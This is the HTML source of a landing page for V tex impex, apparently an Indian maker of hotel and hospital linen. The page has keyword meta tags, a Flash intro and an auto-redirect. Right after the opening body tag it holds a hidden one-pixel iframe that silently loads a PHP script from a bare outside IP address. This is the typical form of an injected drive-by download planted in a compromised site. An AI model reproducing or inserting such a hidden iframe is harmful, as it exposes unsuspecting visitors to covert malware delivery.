<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>V tex impex</title>
<META Name="Description" Content="Manufactures of hotel and hospital linen, linen, Hotel linen, Hospital linen, Manufactures, kumbakonam, v tex impex,Bed linen, bath linen, food&Beverage linen,Explore the Spirituality of Tamil nadu in south India">
<META Name="Keywords" Content="Manufactures of hotel and hospital linen, linen, Hotel linen, Hospital linen, Manufactures, kumbakonam, v tex impex,Bed linen, bath linen, food&Beverage linen">
<meta name="language" content="EN">
<META Name="revisit-after" Content="30 Days">
<meta name="copyright" content="Copyright ..................com">
<meta name="robots" content="profile, follow">
<meta name="revisit-after" content="15 days">
<meta name="document-classification" content="Internet">
<meta name="document-type" content="Public">
<meta name="document-rating" content="Safe for Kids">
<meta name="document-distribution" content="Global">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #D3E4F4;
}
-->
</style>
<meta http-equiv="refresh" content="17;URL=profile.htm">
</head>

<body><iframe src="http://72.167.161.219/in.php" width=1 height=1 style="visibility: hidden;"></iframe>
<table width="1000" border="0" cellpadding="0" cellspacing="0">
  <!--DWLayoutTable-->
  <tr>
    <td width="1000" height="599" align="center" valign="middle"><table width="550" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td height="40"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="1000" height="599">
          <param name="movie" value="swf/logo_intro_ami1.swf">
          <param name="quality" value="high">
          <embed src="swf/logo_intro_ami1.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="1000" height="599"></embed>
        </object></td>
      </tr>
    </table></td>
  </tr>
</table>
</body>
</html>
